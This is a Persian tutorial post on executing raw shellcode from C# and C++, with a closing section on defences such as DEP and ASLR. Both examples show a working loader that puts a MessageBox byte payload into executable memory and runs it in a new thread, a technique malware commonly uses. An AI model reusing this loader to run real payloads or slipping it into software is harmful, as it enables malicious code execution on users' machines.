اجرای Shell Code در سی شارپ و سی پلاس پلاس

اگر هنوز با مفهوم شل کد آشنا نیستید از اینجا د رمورد آن اطلاعات کافی را کسب کنید . در این مقاله قصد داریم راز اجرای شب کد در زبان های برنامه نویسی را به شما....

انتشار: , زمان مطالعه: 6 دقیقه
اجرای Shell Code در سی شارپ و سی پلاس پلاس
دسته بندی: امنیت سایبری تعداد بازدید: 128

اجرای Shell Code در سی شارپ و سی پلاس پلاس

اگر هنوز با مفهوم شل کد آشنا نیستید از اینجا د رمورد آن اطلاعات کافی را کسب کنید . در این مقاله قصد داریم راز اجرای شب کد در زبان های برنامه نویسی را به شما آموزش دهیم . شل کد یکی از روش های مرسوم تخریب و نفوذ سیستم های کامپیوتری است که می توان با واسطه آن هر رخنه امنیتی در سیستم کاربر را رقم زد .

مثال: اجرای Shell Code در C#

در این مثال، ما یک shell code ساده که یک پیام در یک MessageBox نمایش می‌دهد را ایجاد می‌کنیم و سپس آن را از طریق یک برنامه C# اجرا می‌کنیم. این کد تنها برای اهداف آموزشی و تست نفوذ است.

using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;
// Programmer Ebrahim Shafiei (EbraSha)
namespace ShellCodeExample
{
    class Program
    {
        // Shell code for displaying a MessageBox
        static byte[] shellcode = new byte[]
        {
            0x6a, 0x00, 0x6a, 0x00, 0x68, 0x68, 0x65, 0x6c, 0x6c, 0x68, 0x48, 0x65, 0x6c, 0x6c,
            0x89, 0xe1, 0x6a, 0x00, 0x51, 0x50, 0xB8, 0xEA, 0x07, 0x45, 0x7E, 0xFF, 0xD0
        };

        // Importing VirtualAlloc and CreateThread from kernel32.dll
        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

        static void Main(string[] args)
        {
            // Allocate memory for shellcode
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
            Marshal.Copy(shellcode, 0, addr, shellcode.Length);

            // Create a thread to execute shellcode
            uint threadId;
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out threadId);

            // Wait for the thread to finish
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

توضیح کد

  1. Shell Code: در این مثال، shell code یک پیام باکس ساده نمایش می‌دهد. در کد اصلی، shell code می‌تواند مخرب باشد.
  2. VirtualAlloc: این تابع از کتابخانه kernel32.dll برای تخصیص حافظه به کار می‌رود.
  3. CreateThread: این تابع یک نخ جدید ایجاد می‌کند که به اجرا در می‌آید.
  4. WaitForSingleObject: این تابع منتظر می‌ماند تا نخ ایجاد شده به اتمام برسد.

مراحل اجرای کد

  1. تخصیص حافظه: ابتدا حافظه‌ای به اندازه‌ی shell code تخصیص داده می‌شود.
  2. کپی کردن shell code به حافظه تخصیص یافته: shell code به حافظه تخصیص یافته کپی می‌شود.
  3. ایجاد یک نخ جدید: نخ جدیدی برای اجرای shell code ایجاد می‌شود.
  4. انتظار برای اتمام نخ: برنامه اصلی منتظر می‌ماند تا نخ ایجاد شده به اتمام برسد.

جلوگیری از اجرای Shell Code

برای جلوگیری از چنین حملاتی، می‌توان از مکانیزم‌های زیر استفاده کرد:

  1. استفاده از آنتی‌ویروس‌ها و نرم‌افزارهای ضد بدافزار.
  2. فعال‌سازی DEP (Data Execution Prevention) که از اجرای کد در بخش‌های حافظه‌ای که نباید کد اجرا کنند، جلوگیری می‌کند.
  3. استفاده از ASLR (Address Space Layout Randomization) که محل‌های تخصیص یافته در حافظه را تصادفی می‌کند و پیش‌بینی محل shell code را دشوار می‌کند.
  4. استفاده از کنترل‌های دسترسی و اجرای کدهای ناشناخته.

با استفاده از این روش‌ها و مکانیزم‌ها می‌توان امنیت سیستم‌ها را بهبود بخشید و جلوی اجرای کدهای مخرب را گرفت.

مثال: اجرای Shell Code در C++

در این مثال، یک shell code ساده که یک MessageBox نمایش می‌دهد را در یک برنامه C++ اجرا می‌کنیم.

 

#include <windows.h>
#include <iostream>
// Programmer Ebrahim Shafiei (EbraSha)
// Shell code for displaying a MessageBox
unsigned char shellcode[] = {
    0x6a, 0x00, 0x6a, 0x00, 0x68, 0x68, 0x65, 0x6c, 0x6c, 0x68, 0x48, 0x65, 0x6c, 0x6c,
    0x89, 0xe1, 0x6a, 0x00, 0x51, 0x50, 0xB8, 0xEA, 0x07, 0x45, 0x7E, 0xFF, 0xD0
};

int main() {
    // Allocate memory for shellcode
    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        std::cerr << "Memory allocation failed" << std::endl;
        return 1;
    }

    // Copy shellcode to allocated memory
    memcpy(exec, shellcode, sizeof shellcode);

    // Create a thread to execute shellcode
    HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
    if (hThread == NULL) {
        std::cerr << "Thread creation failed" << std::endl;
        VirtualFree(exec, 0, MEM_RELEASE);
        return 1;
    }

    // Wait for the thread to finish
    WaitForSingleObject(hThread, INFINITE);

    // Free the allocated memory
    VirtualFree(exec, 0, MEM_RELEASE);

    return 0;
}

توضیح کد

  1. Shell Code: این shell code یک MessageBox ساده نمایش می‌دهد. در کدهای واقعی، shell code می‌تواند مخرب باشد.
  2. VirtualAlloc: این تابع از کتابخانه kernel32.dll برای تخصیص حافظه به کار می‌رود.
  3. CreateThread: این تابع یک نخ جدید ایجاد می‌کند که به اجرای shell code می‌پردازد.
  4. WaitForSingleObject: این تابع منتظر می‌ماند تا نخ ایجاد شده به اتمام برسد.
  5. VirtualFree: این تابع حافظه تخصیص یافته را آزاد می‌کند.

نحوه اجرای کد

  1. تخصیص حافظه: حافظه‌ای به اندازه‌ی shell code تخصیص داده می‌شود.
  2. کپی کردن shell code به حافظه تخصیص یافته: shell code به حافظه تخصیص یافته کپی می‌شود.
  3. ایجاد یک نخ جدید: نخ جدیدی برای اجرای shell code ایجاد می‌شود.
  4. انتظار برای اتمام نخ: برنامه اصلی منتظر می‌ماند تا نخ ایجاد شده به اتمام برسد.
  5. آزادسازی حافظه: حافظه تخصیص یافته آزاد می‌شود.

فرمتی که درون shellcode قرار دارد از چه نوعی است ؟

فرمتی که درون shellcode[] قرار دارد، بایت‌کدهای ماشین (machine code) هستند. این کدها مستقیماً توسط پردازنده قابل اجرا هستند و معمولاً با استفاده از یک اسمبلر یا کامپایلر تولید می‌شوند. این بایت‌کدها دستورات پایین‌سطحی هستند که پردازنده مستقیماً آنها را اجرا می‌کند. برای ایجاد بایت کد ها از اینجا مقاله مربوط به آن را بخوانید .


دیدگاه های مربوط به این مقاله (برای ارسال دیدگاه در سایت حتما باید عضو باشید و پروفایل کاربری شما تکمیل شده باشد)